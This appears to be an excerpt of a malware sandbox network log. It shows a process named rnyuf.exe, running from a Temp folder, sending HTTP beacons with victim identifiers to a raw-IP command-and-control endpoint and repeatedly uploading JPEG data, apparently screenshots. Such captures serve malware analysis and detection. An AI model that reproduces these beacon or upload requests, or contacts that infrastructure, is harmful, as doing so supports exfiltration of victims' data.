                                        Aug 29, 2021 22:28:56.250917912 CEST16713OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:56.324162006 CEST16713INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:56 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        269192.168.2.45000846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:56.470244884 CEST16714OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:56.470324039 CEST16714OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:56.470479012 CEST16724OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:56.470551968 CEST16727OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:56.503417015 CEST16730OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:56.503443003 CEST16732OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:56.503452063 CEST16735OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:56.503577948 CEST16747OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:56.503607035 CEST16752OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:56.536022902 CEST16756OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:56.536097050 CEST16758OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:28:56.644303083 CEST16823INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:56 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        27192.168.2.44976246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:22.545932055 CEST3933OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:22.546041965 CEST3933OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:22.546282053 CEST3943OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:22.546411037 CEST3946OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:22.581538916 CEST3951OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:22.581578970 CEST3954OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:22.581640005 CEST3966OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:22.581664085 CEST3969OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:22.581890106 CEST3971OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:22.616903067 CEST3977OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:22.617016077 CEST3987OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:22.728499889 CEST4041INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        270192.168.2.45000946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:56.511307955 CEST16753OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:56.590312004 CEST16822INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:56 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        271192.168.2.45001046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:56.850095034 CEST16824OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:56.929399014 CEST16824INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:56 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:28:57.057188034 CEST16824OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:57.061182976 CEST16825OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:57.061398029 CEST16835OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:57.061583042 CEST16837OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:57.093794107 CEST16840OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:57.093832970 CEST16843OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:57.093961954 CEST16848OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:57.094027042 CEST16864OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:28:57.126703978 CEST16869OUTData Raw: 90 14 6d a2 48 8b 15 03 e6 fb a4 b1 c8 ce 7d c5 72 5a aa b7 e3 f7 af d2 e7 53 74 da 7f 81 62 1f 09 c9 3b ed 1a c6 94 aa f7 26 ce dd dd e5 0b 73 30 00 b2 21 f2 f8 c1 65 05 9b 6a e4 f0 48 e6 8b 3f 05 dd dd 5b da c9 f6 ed 36 09 ee a3 9a 58 6d a6 99
                                        Data Ascii: mH}rZStb;&s0!ejH?[6Xm3,$dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28
                                        Aug 29, 2021 22:28:57.126864910 CEST16875OUTData Raw: bd cd ae 3c d4 1d b3 fc fd fd 2b e7 40 4a b0 65 24 10 72 08 ed 5b e9 e2 5b 88 35 7b 4d 72 16 ff 00 4e 55 09 72 bd 04 d8 00 64 ff 00 bc 3a fb 8c f7 15 d7 88 ca 60 dd e9 e9 a7 e3 ff 00 07 f3 38 f0 f9 b4 d2 b5 4d 75 fc 3f e0 7e 47 4b f1 0b fe 48 b6
                                        Data Ascii: <+@Je$r[[5{MrNUrd:`8Mu?~GKH^k~!+kgu]1R4(R){RR-wZbaKIJ(ZJ)8S%p!mpm:ZAKTH)i)E4KO)T`ii-PpA"
                                        Aug 29, 2021 22:28:57.126957893 CEST16901OUTData Raw: a6 5e 1f f4 d9 bf df 34 fd 13 9d 5a 1f ad 47 79 ff 00 1f b3 7f be 6b 9f fe 5f 3f 42 e5 fc 2f 99 0d 06 81 41 ad 8e 71 69 45 34 75 a7 50 21 68 a2 8a 42 16 8e f4 51 48 43 85 14 dc d2 83 48 05 a2 8a 28 10 b4 51 45 00 2d 2d 25 02 90 87 53 d3 ef 0a 8e
                                        Data Ascii: ^4ZGyk_?B/AqiE4uP!hBQHCH(QE--%S:`[N<cyy^/,f@*[:2ra~+_b4fNKNOA8RRfMe!Gjx-)RNZ*@i9!SC-p
                                        Aug 29, 2021 22:28:57.230155945 CEST16932INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:57 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        272192.168.2.45001146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:57.284671068 CEST16932OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:57.367538929 CEST16933INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:57 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        273192.168.2.45001246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:57.606739044 CEST16934OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:57.683044910 CEST16973INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:57 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        274192.168.2.45001346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:57.615484953 CEST16934OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
